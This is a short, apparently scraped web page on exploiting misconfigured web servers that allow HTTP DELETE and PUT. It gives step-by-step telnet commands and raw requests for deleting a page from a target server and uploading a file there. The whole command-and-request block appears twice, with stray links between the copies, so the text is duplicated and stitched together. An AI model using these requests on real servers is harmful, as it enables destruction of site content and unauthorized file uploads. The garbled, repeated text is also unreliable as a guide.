Compromising server exploiting misconfiguration
http://www.appshelter.net/2011/09/http-delete-method-exploit.html
HTTP DELETE Method Exploit
After executing the OPTIONS HTTP method you will find a list of allowed methods, Which means those methods are supported by your web server. Now if DELETE method is available in the allowed method list, then you can use this method to delete some page from the web server, So when use of that website browse that page the web server is not able to server the request and through page not found 404 error. To perform this test follow the below steps:
First open the command prompt and type the below command
telnet www.TargetApplication.com 80
DELETE /TargetPage.jsp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: anysite
Content-Length: 2381
Connection: Keep-Alive
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5958.0/
PUT /test.txt HTTP/1.1
Host: 192.168.1.199
Content-Length: 6
First open the command prompt and type the below command
telnet www.TargetApplication.com 80
DELETE /TargetPage.jsp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: anysite
Content-Length: 2381
Connection: Keep-Alive
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5958.0/
PUT /test.txt HTTP/1.1
Host: 192.168.1.199
Content-Length: 6